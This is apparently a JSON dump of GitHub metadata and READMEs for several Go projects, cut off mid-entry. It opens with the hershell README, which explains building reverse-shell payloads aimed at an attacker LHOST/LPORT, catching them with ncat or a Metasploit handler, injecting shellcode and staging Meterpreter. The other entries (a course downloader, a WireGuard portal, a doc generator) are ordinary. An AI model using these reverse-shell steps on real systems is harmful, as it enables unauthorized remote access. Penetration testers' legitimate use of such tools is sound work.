started & dependencies\n\nAs this is a Go project, you will need to follow the [official documentation](https://golang.org/doc/install) to set up\nyour Golang environment (with the `$GOPATH` environment variable).\n\nThen, just run `go get github.com/sysdream/hershell` to fetch the project.\n\n### Building the payload\n\nTo simplify things, you can use the provided Makefile.\nYou can set the following environment variables:\n\n- ``GOOS`` : the target OS\n- ``GOARCH`` : the target architecture\n- ``LHOST`` : the attacker IP or domain name\n- ``LPORT`` : the listener port\n\nFor the ``GOOS`` and ``GOARCH`` variables, you can get the allowed values [here](https://golang.org/doc/install/source#environment).\n\nHowever, some helper targets are available in the ``Makefile``:\n\n- ``depends`` : generate the server certificate (required for the reverse shell)\n- ``windows32`` : builds a windows 32 bits executable (PE 32 bits)\n- ``windows64`` : builds a windows 64 bits executable (PE 64 bits)\n- ``linux32`` : builds a linux 32 bits executable (ELF 32 bits)\n- ``linux64`` : builds a linux 64 bits executable (ELF 64 bits)\n- ``macos32`` : builds a mac os 32 bits executable (Mach-O)\n- ``macos64`` : builds a mac os 64 bits executable (Mach-O)\n\nFor those targets, you just need to set the ``LHOST`` and ``LPORT`` environment variables.\n\n### Using the shell\n\nOnce executed, you will be provided with a remote shell.\nThis custom interactive shell will allow you to execute system commands through `cmd.exe` on Windows, or `/bin/sh` on UNIX machines.\n\nThe following special commands are supported:\n\n* ``run_shell`` : drops you an system shell (allowing you, for example, to change directories)\n* ``inject `` : injects a shellcode (base64 encoded) in the same process memory, and executes it (Windows only at the moment).\n* ``meterpreter [tcp|http|https] IP:PORT`` : connects to a multi/handler to get a stage2 reverse tcp, http or https meterpreter from metasploit, and execute the shellcode in memory (Windows only at the moment)\n* ``exit`` : exit gracefully\n\n## Usage\n\nFirst of all, you will need to generate a valid certificate:\n```bash\n$ make depends\nopenssl req -subj '/CN=yourcn.com/O=YourOrg/C=FR' -new -newkey rsa:4096 -days 3650 -nodes -x509 -keyout server.key -out server.pem\nGenerating a 4096 bit RSA private key\n....................................................................................++\n.....++\nwriting new private key to 'server.key'\n-----\ncat server.key >> server.pem\n```\n\nFor windows:\n\n```bash\n# Predifined 32 bit target\n$ make windows32 LHOST=192.168.0.12 LPORT=1234\n# Predifined 64 bit target\n$ make windows64 LHOST=192.168.0.12 LPORT=1234\n```\n\nFor Linux:\n```bash\n# Predifined 32 bit target\n$ make linux32 LHOST=192.168.0.12 LPORT=1234\n# Predifined 64 bit target\n$ make linux64 LHOST=192.168.0.12 LPORT=1234\n```\n\nFor Mac OS X\n```bash\n$ make macos LHOST=192.168.0.12 LPORT=1234\n```\n\n## Examples\n\n### Basic usage\n\nOne can use various tools to handle incomming connections, such as:\n\n* socat\n* ncat\n* openssl server module\n* metasploit multi handler (with a `python/shell_reverse_tcp_ssl` payload)\n\nHere is an example with `ncat`:\n\n```bash\n$ ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 1234\nNcat: Version 7.60 ( https://nmap.org/ncat )\nNcat: Listening on :::1234\nNcat: Listening on 0.0.0.0:1234\nNcat: Connection from 172.16.122.105.\nNcat: Connection from 172.16.122.105:47814.\n[hershell]> whoami\ndesktop-3pvv31a\\lab\n```\n\n### Meterpreter staging\n\n**WARNING**: this currently only work for the Windows platform.\n\nThe meterpreter staging currently supports the following payloads :\n\n* `windows/meterpreter/reverse_tcp`\n* `windows/x64/meterpreter/reverse_tcp`\n* `windows/meterpreter/reverse_http`\n* `windows/x64/meterpreter/reverse_http`\n* `windows/meterpreter/reverse_https`\n* `windows/x64/meterpreter/reverse_https`\n\nTo use the correct one, just specify the transport you want to use (tcp, http, https)\n\nTo use the meterpreter staging feature, just start your handler:\n\n```bash\n[14:12:45][172.16.122.105][Sessions: 0][Jobs: 0] > use exploit/multi/handler\n[14:12:57][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https\npayload => windows/x64/meterpreter/reverse_https\n[14:13:12][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set lhost 172.16.122.105\nlhost => 172.16.122.105\n[14:13:15][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set lport 8443\nlport => 8443\n[14:13:17][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set HandlerSSLCert ./server.pem\nHandlerSSLCert => ./server.pem\n[14:13:26][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > exploit -j\n[*] Exploit running as background job 0.\n\n[*] [2018.01.29-14:13:29] Started HTTPS reverse handler on https://172.16.122.105:8443\n[14:13:29][172.16.122.105][Sessions: 0][Jobs: 1] exploit(multi/handler) >\n```\n\nThen, in `hershell`, use the `meterpreter` command:\n\n```bash\n[hershell]> meterpreter https 172.16.122.105:8443\n```\n\nA new meterpreter session should pop in `msfconsole`:\n\n```bash\n[14:13:29][172.16.122.105][Sessions: 0][Jobs: 1] exploit(multi/handler) >\n[*] [2018.01.29-14:16:44] https://172.16.122.105:8443 handling request from 172.16.122.105; (UUID: pqzl9t5k) Staging x64 payload (206937 bytes) ...\n[*] Meterpreter session 1 opened (172.16.122.105:8443 -> 172.16.122.105:44804) at 2018-01-29 14:16:44 +0100\n\n[14:16:46][172.16.122.105][Sessions: 1][Jobs: 1] exploit(multi/handler) > sessions\n\nActive sessions\n===============\n\n Id Name Type Information Connection\n -- ---- ---- ----------- ----------\n 1 meterpreter x64/windows DESKTOP-3PVV31A\\lab @ DESKTOP-3PVV31A 172.16.122.105:8443 -> 172.16.122.105:44804 (10.0.2.15)\n\n[14:16:48][172.16.122.105][Sessions: 1][Jobs: 1] exploit(multi/handler) > sessions -i 1\n[*] Starting interaction with 1...\n\nmeterpreter > getuid\nServer username: DESKTOP-3PVV31A\\lab\n```\n\n## Credits\n\nRonan Kervella ``\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "tokopedia/gripmock", "link": "https://github.com/tokopedia/gripmock", "tags": ["grpc", "mock", "mockserver"], "stars": 509, "description": "gRPC Mock Server", "lang": "Go", "repo_lang": "", "readme": "", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "mmzou/geektime-dl", "link": "https://github.com/mmzou/geektime-dl", "tags": [], "stars": 509, "description": "\ud83d\udc7e Geektime-dl \u662f\u4f7f\u7528Go\u6784\u5efa\u7684\u5feb\u901f\u3001\u7b80\u5355\u7684\u6781\u5ba2\u65f6\u95f4\u4e0b\u8f7d\u5668\uff0c\u652f\u6301\u4e13\u680f\u4e0b\u8f7d\u4e3aPDF\u6587\u6863\u3002", "lang": "Go", "repo_lang": "", "readme": "##geektime-dl\n\n[![Go Report Card](https://goreportcard.com/badge/github.com/mmzou/geektime-dl)](https://goreportcard.com/report/github.com/mmzou/geektime-dl)\n[![GitHub release](https://img.shields.io/github/v/release/mmzou/geektime-dl.svg)](https://github.com/mmzou/geektime-dl/releases)\n\n\ud83d\udc7e Geektime-dl is a fast and simple [Geektime](https://time.geekbang.org/) downloader built in Go, and supports downloading columns as PDF documents.\n\n### `Video download has expired`: The video of Geek Time uses the private encryption method of Alibaba Cloud video, and there is no way to crack it for the time being!\n\n- [installation](#installation)\n - [required condition](#required condition)\n - [Install using `go get`](#%e4%bd%bf%e7%94%a8go-get%e5%ae%89%e8%a3%85)\n- [Getting Started](#%e5%85%a5%e9%97%a8)\n - [Download of videos and columns](#Download of videos and columns)\n - [View video or column list](#View video or column list)\n - [Can resume and continue downloading](#Can resume and continue downloading)\n - [login](#login)\n- [reference warehouse](#reference warehouse)\n- [License](#license)\n\n## Install\n\n### Prerequisites\n\nThe following dependencies must be installed:\n\n* **[FFmpeg](https://www.ffmpeg.org)**\n\n> **Note**: The use of FFmpeg is to merge the final video files into the required format.\n\n* **[Google-Chrome](https://www.google.cn/intl/zh-CN/chrome/)**\n\n> **Note**: Use the [`chromedp/chromedp`](https://github.com/chromedp/chromedp) tool to export pages as PDF documents, which requires the support of Google Chrome.\n\n### Install using `go get`\n\nTo install Geektime-dl, you can use the following `go get` command, or download the binary file from the [Releases](https://github.com/mmzou/geektime-dl/releases) page.\n\n```bash\n$ go get github.com/mmzou/geektime-dl\n```\n\n## getting Started\n\nInstructions:\n\n```bash\n#download\ngeektime-dl [OPTIONS] course_id [directory_id]\n#View columns, videos, login and other command operations\ngeektime-dl [OPTIONS] command\n```\n\ninclude command\n\n```text\n login login geek time\n who gets the current account number\n users get account list\n su switch Geek Time account\n buy Get purchased columns and video courses\n column Get column list\n video Get a list of video lessons\n help, h help\n```\n\n\n### Download of videos and columns\n\nOnly purchased or free videos and columns can be downloaded.\n\n```console\n$ geektime -dl 66\n01 - What is Microservice Architecture? 107.55 MiB / 107.54 MiB [=======================================] 100.01% 1.42 MiB/s 1m15s\n02 - How do architects weigh the pros and cons of microservices? 92.10 MiB / 92.09 MiB [===============================] 100.01% 1.69 MiB/s 54s\n03 - What enlightenment does Conway's law and microservices give architects? 69.38 MiB / 69.38 MiB [=======================] 100.01% 1.68 MiB/s 41s\n04 - When should enterprises start to consider introducing microservices? 114.20 MiB / 114.20 MiB [====================] 100.00% 1.41 MiB/s 1m21s\n05 - What kind of organizational structure is more suitable for microservices? 121.10 MiB / 121.09 MiB [===========================] 100.00% 1.66 MiB/s 1m13s\n06 - How to understand Alibaba's microservice mid-stage strategy? 65.23 MiB / 126.82 MiB [===========>---------] 51.43% 1.68 MiB/s 1m15s\n```\n\nJust download one of the catalogs in the course\n\n```console\n$ geektime -dl 66 2276\n16 - Microservice Monitoring System Layering and Monitoring Architecture 11.22 MiB / 97.55 MiB [======>--------------------] 28.51% 1.30 MiB/ s 01m06s\n```\n\nWhen downloading a column, you can also download the content of the column as a PDF document (`Google browser support is required`)\n\n```console\n04 - Static Containers: How Office Supplies Expresses Your Content? 13.94 MiB / 13.94 MiB [=====================] 100.00% 2.23 MiB/s 6s\nGenerating files: [04 - Static Containers: How do office supplies express your content? .pdf] Done\n```\n\n> **Note**: `If the generated file fails, you can repeat the command to generate again for the failed file`, the generated file will not be generated repeatedly. If you fail many times, you can ask questions in Issues.\n\nView the downloadable catalog within the course\n\n```console\n$ geektime-dl -i 66\n+----+------+------+------------------------------ ----------------+---------+---------+---------+--- ---+\n| # | ID | Type | Name | SD | LD | HD | Download |\n+----+------+------+------------------------------ ----------------+---------+---------+---------+--- ---+\n| 0 | 2184 | Video | 01 What is Microservice Architecture? | 86.52M | 53.45M | 107.54M | \u2714 |\n| 1 | 2185 | Video | 02 How do architects weigh the pros and cons of microservices? | 71.43M | 44.12M | 92.09M | \u2714 |\n| 2 | 2154 | Video | 03 What enlightenment does Conway's law and microservices give architects? | 54.32M | 33.57M | 69.38M | \u2714 |\n| 3 | 2186 | Video | 04 When Should Enterprises Consider Microservices? | 90.07M | 55.67M | 114.20M | \u2714 |\n| 4 | 2187 | Video | 05 What kind of organizational structure is more suitable for microservices? | 90.22M | 55.79M | 121.09M | \u2714 |\n| 5 | 2188 | Video | 06 How to understand Alibaba's microservice middle-end strategy? | 126.82M | 100.05M | 61.79M | \u2714 |\n| 6 | 2189 | Video | 07 How to give a clear and concise service layering method? | 45.89M | 62.07M | 61.95M | \u2714 |\n| 7 | 2222 | Video | 08 How is the overall technical architecture of microservices designed? | 85.67M | 52.91M | 109.83M | \u2714 |\n| 8 | 2269 | Video | 09 Three classic service discovery mechanisms for microservices | 94.00M | 73.18M | 45.21M | \u2714 |\n```\n\n### View a list of videos or columns\n\n```bash\n#View column list\n$ geektime -dl column\n+----+-----+---------------------------+---------- --+------------------+------+\n| # | ID | Name | Time | Author | Purchase |\n+----+-----+---------------------------+---------- --+------------------+------+\n| 0 | 42 | Technology and Business Case Interpretation | 2017-09-07 | Xu Fei | |\n| 1 | 43 | AI Technology Internal Reference | 2017-09-11 | Hong Liangjie | |\n| 2 | 48 | The left ear listens to the wind| 2017-09-20 | Chen Hao | Yes |\n| 3 | 49 | Zhu Yun's technical management class | 2017-11-09 | Zhu Yun | Yes |\n| 4 | 50 | Qiu Yue's product notes | 2017-11-16 | Qiu Yue | |\n| 5 | 62 | Artificial Intelligence Basic Course | 2017-12-01 | Wang Tianyi | Yes |\n| 6 | 63 | Zhao Cheng's operation and maintenance system management course | 2017-12-13 | Zhao Cheng | |\n| 7 | 74 | Thirty-six types of recommendation system | 2018-02-23 |\n| 8 | 76 | Simple explanation of blockchain | 2018-03-19 | Chen Hao | Yes |\n\n\n#View video list\n$ geektime -dl video\n+----+-----+-------------------------------------- ----+------------+-------------+------+\n| # | ID | Name | Time | Author | Purchase |\n+----+-----+-------------------------------------- ----+------------+-------------+------+\n| 0 | 66 | 20 Lectures on the Core of Microservice Architecture | 2018-01-08 | Yang Bo | Yes |\n| 1 | 77 | 9 hours to complete the development of WeChat applets | 2018-03-22 | Gao Lei | |\n| 2 | 84 | 160 Lectures on Microservice Architecture | 2018-05-03 | Yang Bo | Yes |\n| 3 | 98 | Learning Python from Zero | 2018-05-25 | Yin Huisheng | |\n```\n\n### Can resume and continue downloading\n\nCtrl+C Interrupts the download.\n\nThere is `.download` temporary file, execute `geektime-dl` command with the same parameters, then the download progress will resume from the previous session.\n\n### Log in\n\nLogin with account and password:\n\n```console\n$ geektime-dl login --phone xxxxxx --password xxxxxx\nGeek time account login successful: XXX\n```\n\nLogin via cookie:\n\n```console\n$ geektime-dl login --gcid xxxxxx --gcess xxxxxx --serverId 'xxxxxxx'\nGeek time account login successful: XXX\n```\n\n## Reference repository\n\n* [annie](https://github.com/iawia002/annie)\n\n\n## License\n\nMIT\n\nCopyright (c) 2020-present, mmzou", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "h44z/wg-portal", "link": "https://github.com/h44z/wg-portal", "tags": ["wireguard", "vpn", "ui", "webinterface", "usermanagement", "ldap"], "stars": 508, "description": "WireGuard Configuration Portal with LDAP connection", "lang": "Go", "repo_lang": "", "readme": "# WireGuard Portal\n\n[![Build Status](https://travis-ci.com/h44z/wg-portal.svg?token=q4pSqaqT58Jzpxdx62xk&branch=master)](https://travis-ci.com/h44z/wg-portal)\n[![License: MIT](https://img.shields.io/badge/license-MIT-green.svg)](https://opensource.org/licenses/MIT)\n![GitHub last commit](https://img.shields.io/github/last-commit/h44z/wg-portal)\n[![Go Report Card](https://goreportcard.com/badge/github.com/h44z/wg-portal)](https://goreportcard.com/report/github.com/h44z/wg-portal)\n![GitHub go.mod Go version](https://img.shields.io/github/go-mod/go-version/h44z/wg-portal)\n![GitHub code size in bytes](https://img.shields.io/github/languages/code-size/h44z/wg-portal)\n[![Docker Pulls](https://img.shields.io/docker/pulls/h44z/wg-portal.svg)](https://hub.docker.com/r/h44z/wg-portal/)\n\nA simple, web based configuration portal for [WireGuard](https://wireguard.com).\nThe portal uses the WireGuard [wgctrl](https://github.com/WireGuard/wgctrl-go) library to manage existing VPN\ninterfaces. This allows for seamless activation or deactivation of new users, without disturbing existing VPN\nconnections.\n\nThe configuration portal currently supports using SQLite and MySQL as a user source for authentication and profile data.\nIt also supports LDAP (Active Directory or OpenLDAP) as authentication provider.\n\n## Features\n * Self-hosted and web based\n * Automatically select IP from the network pool assigned to client\n * QR-Code for convenient mobile client configuration\n * Sent email to client with QR-code and client config\n * Enable / Disable clients seamlessly\n * Generation of `wgX.conf` after any modification\n * IPv6 ready\n * User authentication (SQLite/MySQL and LDAP)\n * Dockerized\n * Responsive template\n * One single binary\n * Can be used with existing WireGuard setups\n * Support for multiple WireGuard interfaces\n * REST API for management and client deployment\n * Peer Expiry Feature\n\n![Screenshot](screenshot.png)\n\n## Setup\nMake sure that your host system has at least one WireGuard interface (for example wg0) available.\nIf you did not start up a WireGuard interface yet, take a look at [wg-quick](https://manpages.debian.org/unstable/wireguard-tools/wg-quick.8.en.html) in order to get started.\n\n### Docker\nThe easiest way to run WireGuard Portal is to use the Docker image provided.\n\nHINT: the *latest* tag always refers to the master branch and might contain unstable or incompatible code!\n\nDocker Compose snippet with some sample configuration values:\n```\nversion: '3.6'\nservices:\n wg-portal:\n image: h44z/wg-portal:latest\n container_name: wg-portal\n restart: unless-stopped\n cap_add:\n - NET_ADMIN\n network_mode: \"host\"\n volumes:\n - /etc/wireguard:/etc/wireguard\n - ./data:/app/data\n ports:\n - '8123:8123'\n environment:\n # WireGuard Settings\n - WG_DEVICES=wg0\n - WG_DEFAULT_DEVICE=wg0\n - WG_CONFIG_PATH=/etc/wireguard\n # Core Settings\n - EXTERNAL_URL=https://vpn.company.com\n - WEBSITE_TITLE=WireGuard VPN\n - COMPANY_NAME=Your Company Name\n - ADMIN_USER=admin@domain.com\n - ADMIN_PASS=supersecret\n # Mail Settings\n - MAIL_FROM=WireGuard VPN \n - EMAIL_HOST=10.10.10.10\n - EMAIL_PORT=25\n # LDAP Settings\n - LDAP_ENABLED=true\n - LDAP_URL=ldap://srv-ad01.company.local:389\n - LDAP_BASEDN=DC=COMPANY,DC=LOCAL\n - LDAP_USER=ldap_wireguard@company.local\n - LDAP_PASSWORD=supersecretldappassword\n - LDAP_ADMIN_GROUP=CN=WireGuardAdmins,OU=Users,DC=COMPANY,DC=LOCAL\n```\nPlease note that mapping ```/etc/wireguard``` to ```/etc/wireguard``` inside the docker, will erase your host's current configuration.\nIf needed, please make sure to back up your files from ```/etc/wireguard```.\nFor a full list of configuration options take a look at the source file [internal/server/configuration.go](internal/server/configuration.go#L58).\n\n### Standalone\nFor a standalone application, use the Makefile provided in the repository to build the application. Go version 1.16 or higher has to be installed to build WireGuard Portal.\n\n```shell\n# show all possible make commands\nmake\n\n# build wg-portal for current system architecture\nmake build\n```\n\nThe compiled binary will be located in the dist folder.\nA detailed description for using this software with a raspberry pi can be found in the [README-RASPBERRYPI.md](README-RASPBERRYPI.md).\n\nTo build the Docker image, Docker (> 20.x) with buildx is required. If you want to build cross-platform images, you need to install qemu.\nOn arch linux for example install: `docker-buildx qemu-user-static qemu-user-static-binfmt`.\n\nOnce the Docker setup is completed, create a new buildx builder: \n```shell\ndocker buildx create --name wgportalbuilder --platform linux/arm/v7,linux/arm64,linux/amd64\ndocker buildx use wgportalbuilder\ndocker buildx inspect --bootstrap\n```\nNow you can compile the Docker image:\n```shell\n# multi platform build, can only be exported to tar archives\ndocker buildx build --platform linux/arm/v7,linux/arm64,linux/amd64 --output type=local,dest=docker_images \\\n --build-arg BUILD_IDENTIFIER=dev --build-arg BUILD_VERSION=0.1 -t h44z/wg-portal .\n \n\n# image for current platform only (same as docker build)\ndocker buildx build --load \\\n --build-arg BUILD_IDENTIFIER=dev --build-arg BUILD_VERSION=0.1 -t h44z/wg-portal .\n```\n\n## Configuration\nYou can configure WireGuard Portal using either environment variables or a yaml configuration file.\nThe filepath of the yaml configuration file defaults to **config.yml** in the working directory of the executable.\nIt is possible to override the configuration filepath using the environment variable **CONFIG_FILE**.\nFor example: `CONFIG_FILE=/home/test/config.yml ./wg-portal-amd64`.\n\n### Configuration Options\nThe following configuration options are available:\n\n| environment | yaml | yaml_parent | default_value | description |\n|----------------------------|-------------------------|-------------|-----------------------------------------------------------------------------------------------------------------|---------------------------------------------------------------------------------------------------------------------------------------------------------|\n| LISTENING_ADDRESS | listeningAddress | core | :8123 | The address on which the web server is listening. Optional IP address and port, e.g.: 127.0.0.1:8080. |\n| EXTERNAL_URL | externalUrl | core | http://localhost:8123 | The external URL where the web server is reachable. This link is used in emails that are created by the WireGuard Portal. |\n| WEBSITE_TITLE | title | core | WireGuard VPN | The website title. |\n| COMPANY_NAME | company | core | WireGuard Portal | The company name (for branding). |\n| MAIL_FROM | mailFrom | core | WireGuard VPN | The email address from which emails are sent. |\n| LOGO_URL | logoUrl | core | /img/header-logo.png | The logo displayed in the page's header. |\n| ADMIN_USER | adminUser | core | admin@wgportal.local | The administrator user. Must be a valid email address. |\n| ADMIN_PASS | adminPass | core | wgportal | The administrator password. If unchanged, a random password will be set on first startup. |\n| EDITABLE_KEYS | editableKeys | core | true | Allow to edit key-pairs in the UI. |\n| CREATE_DEFAULT_PEER | createDefaultPeer | core | false | If an LDAP user logs in for the first time, a new WireGuard peer will be created on the WG_DEFAULT_DEVICE if this option is enabled. |\n| SELF_PROVISIONING | selfProvisioning | core | false | Allow registered users to automatically create peers via the RESTful API. |\n| WG_EXPORTER_FRIENDLY_NAMES | wgExporterFriendlyNames | core | false | Enable integration with [prometheus_wireguard_exporter friendly name](https://github.com/MindFlavor/prometheus_wireguard_exporter#friendly-tags). |\n| LDAP_ENABLED | ldapEnabled | core | false | Enable or disable the LDAP backend. |\n| SESSION_SECRET | sessionSecret | core | secret | Use a custom secret to encrypt session data. |\n| BACKGROUND_TASK_INTERVAL | backgroundTaskInterval | core | 900 | The interval (in seconds) for the background tasks (like peer expiry check). |\n| EXPIRY_REENABLE | expiryReEnable | core | false | Reactivate expired peers if the expiration date is in the future. |\n| DATABASE_TYPE | typ | database | sqlite | Either mysql or sqlite. |\n| DATABASE_HOST | host | database | | The mysql server address. |\n| DATABASE_PORT | port | database | | The mysql server port. |\n| DATABASE_NAME | database | database | data/wg_portal.db | For sqlite database: the database file-path, otherwise the database name. |\n| DATABASE_USERNAME | user | database | | The mysql user. |\n| DATABASE_PASSWORD | password | database | | The mysql password. |\n| EMAIL_HOST | host | email | 127.0.0.1 | The email server address. |\n| EMAIL_PORT | port | email | 25 | The email server port. |\n| EMAIL_TLS | tls | email | false | Use STARTTLS. DEPRECATED: use EMAIL_ENCRYPTION instead. |\n| EMAIL_ENCRYPTION | encryption | email | none | Either none, tls or starttls. |\n| EMAIL_CERT_VALIDATION | certcheck | email | false | Validate the email server certificate. |\n| EMAIL_USERNAME | user | email | | An optional username for SMTP authentication. |\n| EMAIL_PASSWORD | pass | email | | An optional password for SMTP authentication. |\n| EMAIL_AUTHTYPE | auth | email | plain | Either plain, login or crammd5. If username and password are empty, this value is ignored. |\n| WG_DEVICES | devices | wg | wg0 | A comma separated list of WireGuard devices. |\n| WG_DEFAULT_DEVICE | defaultDevice | wg | wg0 | This device is used for auto-created peers (if CREATE_DEFAULT_PEER is enabled). |\n| WG_CONFIG_PATH | configDirectory | wg | /etc/wireguard | If set, interface configuration updates will be written to this path, filename: .conf. |\n| MANAGE_IPS | manageIPAddresses | wg | true | Handle IP address setup of interface, only available on linux. |\n| USER_MANAGE_PEERS | userManagePeers | wg | false | Logged in user can create or update peers (partially). |\n| LDAP_URL | url | ldap | ldap://srv-ad01.company.local:389 | The LDAP server url. |\n| LDAP_STARTTLS | startTLS | ldap | true | Use STARTTLS. |\n| LDAP_CERT_VALIDATION | certcheck | ldap | false | Validate the LDAP server certificate. |\n| LDAP_BASEDN | dn | ldap | DC=COMPANY,DC=LOCAL | The base DN for searching users. |\n| LDAP_USER | user | ldap | company\\\\\\\\ldap_wireguard | The bind user. |\n| LDAP_PASSWORD | pass | ldap | SuperSecret | The bind password. |\n| LDAP_LOGIN_FILTER | loginFilter | ldap | (&(objectClass=organizationalPerson)(mail={{login_identifier}})(!userAccountControl:1.2.840.113556.1.4.803:=2)) | {{login_identifier}} will be replaced with the login email address. |\n| LDAP_SYNC_FILTER | syncFilter | ldap | (&(objectClass=organizationalPerson)(!userAccountControl:1.2.840.113556.1.4.803:=2)(mail=*)) | The filter string for the LDAP synchronization service. Users matching this filter will be synchronized with the WireGuard Portal database. |\n| LDAP_SYNC_GROUP_FILTER | syncGroupFilter | ldap | | The filter string for the LDAP groups, for example: (objectClass=group). The groups are used to recursively check for admin group member ship of users. |\n| LDAP_ADMIN_GROUP | adminGroup | ldap | CN=WireGuardAdmins,OU=_O_IT,DC=COMPANY,DC=LOCAL | Users in this group are marked as administrators. |\n| LDAP_ATTR_EMAIL | attrEmail | ldap | mail | User email attribute. |\n| LDAP_ATTR_FIRSTNAME | attrFirstname | ldap | givenName | User firstname attribute. |\n| LDAP_ATTR_LASTNAME | attrLastname | ldap | sn | User lastname attribute. |\n| LDAP_ATTR_PHONE | attrPhone | ldap | telephoneNumber | User phone number attribute. |\n| LDAP_ATTR_GROUPS | attrGroups | ldap | memberOf | User groups attribute. |\n| LDAP_CERT_CONN | ldapCertConn | ldap | false | Allow connection with certificate against LDAP server without user/password |\n| LDAPTLS_CERT | ldapTlsCert | ldap | | The LDAP cert's path |\n| LDAPTLS_KEY | ldapTlsKey | ldap | | The LDAP key's path |\n| LOG_LEVEL | | | debug | Specify log level, one of: trace, debug, info, off. |\n| LOG_JSON | | | false | Format log output as JSON. |\n| LOG_COLOR | | | true | Colorize log output. |\n| CONFIG_FILE | | | config.yml | The config file path. |\n\n### Sample yaml configuration\nconfig.yml:\n```yaml\ncore:\n listeningAddress: :8123\n externalUrl: https://wg-test.test.com\n adminUser: test@test.com\n adminPass: test\n editableKeys: true\n createDefaultPeer: false\n ldapEnabled: true\n mailFrom: WireGuard VPN \nldap:\n url: ldap://10.10.10.10:389\n dn: DC=test,DC=test\n startTLS: false\n user: wireguard@test.test\n pass: test\n adminGroup: CN=WireGuardAdmins,CN=Users,DC=test,DC=test\ndatabase:\n typ: sqlite\n database: data/wg_portal.db\nemail:\n host: smtp.gmail.com\n port: 587\n tls: true\n user: test@gmail.com\n pass: topsecret\nwg:\n devices:\n - wg0\n - wg1\n defaultDevice: wg0\n configDirectory: /etc/wireguard\n manageIPAddresses: true\n```\n\n### RESTful API\nWireGuard Portal offers a RESTful API to interact with.\nThe API is documented using OpenAPI 2.0, the Swagger UI can be found\nunder the URL `http:///swagger/index.html?displayOperationId=true`.\n\nThe [API's unittesting](tests/test_API.py) may serve as an example how to make use of the API with python3 & pyswagger.\n\n## What is out of scope\n * Creating or removing WireGuard (wgX) interfaces.\n * Generation or application of any `iptables` or `nftables` rules.\n * Setting up or changing IP-addresses of the WireGuard interface on operating systems other than linux.\n * Importing private keys of an existing WireGuard setup.\n\n## Application stack\n\n * [Gin, HTTP web framework written in Go](https://github.com/gin-gonic/gin)\n * [go-template, data-driven templates for generating textual output](https://golang.org/pkg/text/template/)\n * [Bootstrap, for the HTML templates](https://getbootstrap.com/)\n * [JQuery, for some nice JavaScript effects ;)](https://jquery.com/)\n\n## License\n\n * MIT License. [MIT](LICENSE.txt) or https://opensource.org/licenses/MIT\n\n\nThis project was inspired by [wg-gen-web](https://github.com/vx3r/wg-gen-web).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "robertkrimen/godocdown", "link": "https://github.com/robertkrimen/godocdown", "tags": [], "stars": 508, "description": "Format package documentation (godoc) as GitHub friendly Markdown", "lang": "Go", "repo_lang": "", "readme": "# godocdown\n--\nCommand godocdown generates Go documentation in a GitHub-friendly Markdown\nformat.\n\n $ go get github.com/robertkrimen/godocdown/godocdown\n\n $ godocdown /path/to/package > README.markdown\n\n # Generate documentation for the package/command in the current directory\n $ godocdown > README.markdown\n\n # Generate standard Markdown\n $ godocdown -plain .\n\nThis program is targeted at providing nice-looking documentation for GitHub.\nWith this in mind, it generates GitHub Flavored Markdown\n(http://github.github.com/github-flavored-markdown/) by default. This can be\nchanged with the use of the \"plain\" flag to generate standard Markdown.\n\n### Install\n\n go get github.com/robertkrimen/godocdown/godocdown\n\n\n### Example\n\nhttp://github.com/robertkrimen/godocdown/blob/master/example.markdown\n\n### Usage\n\n -output=\"\"\n Write output to a file instead of stdout\n Write to stdout with -\n\n -template=\"\"\n The template file to use\n\n -no-template=false\n Disable template processing\n\n -plain=false\n Emit standard Markdown, rather than Github Flavored Markdown\n\n -heading=\"TitleCase1Word\"\n Heading detection method: 1Word, TitleCase, Title, TitleCase1Word, \"\"\n For each line of the package declaration, godocdown attempts to detect if\n a heading is present via a pattern match. If a heading is detected,\n it prefixes the line with a Markdown heading indicator (typically \"###\").\n\n 1Word: Only a single word on the entire line\n [A-Za-z0-9_-]+\n\n TitleCase: A line where each word has the first letter capitalized\n ([A-Z][A-Za-z0-9_-]\\s*)+\n\n Title: A line without punctuation (e.g. a period at the end)\n ([A-Za-z0-9_-]\\s*)+\n\n TitleCase1Word: The line matches either the TitleCase or 1Word pattern\n\n\n### Templating\n\nIn addition to Markdown rendering, godocdown provides templating via\ntext/template (http://golang.org/pkg/text/template/) for further customization.\nBy putting a file named \".godocdown.template\" (or one from the list below) in\nthe same directory as your package/command, godocdown will know to use the file\nas a template.\n\n # text/template\n .godocdown.markdown\n .godocdown.md\n .godocdown.template\n .godocdown.tmpl\n\nA template file can also be specified with the \"-template\" parameter\n\nAlong with the standard template functionality, the starting data argument has\nthe following interface:\n\n {{ .Emit }}\n // Emit the standard documentation (what godocdown would emit without a template)\n\n {{ .EmitHeader }}\n // Emit the package name and an import line (if one is present/needed)\n\n {{ .EmitSynopsis }}\n // Emit the package declaration\n\n {{ .EmitUsage }}\n // Emit package usage, which includes a constants section, a variables section,\n // a functions section, and a types section. In addition, each type may have its own constant,\n // variable, and/or function/method listing.\n\n {{ if .IsCommand }} ... {{ end }}\n // A boolean indicating whether the given package is a command or a plain package\n\n {{ .Name }}\n // The name of the package/command (string)\n\n {{ .ImportPath }}\n // The import path for the package (string)\n // (This field will be the empty string if godocdown is unable to guess it)\n\n--\n**godocdown** http://github.com/robertkrimen/godocdown\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "awalterschulze/gographviz", "link": "https://github.com/awalterschulze/gographviz", "tags": ["graphviz", "golang", "graphviz-dot-language", "go", "parse"], "stars": 508, "description": "Parses the Graphviz DOT language in golang", "lang": "Go", "repo_lang": "", "readme": "", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "suifengqjn/videoWater", "link": 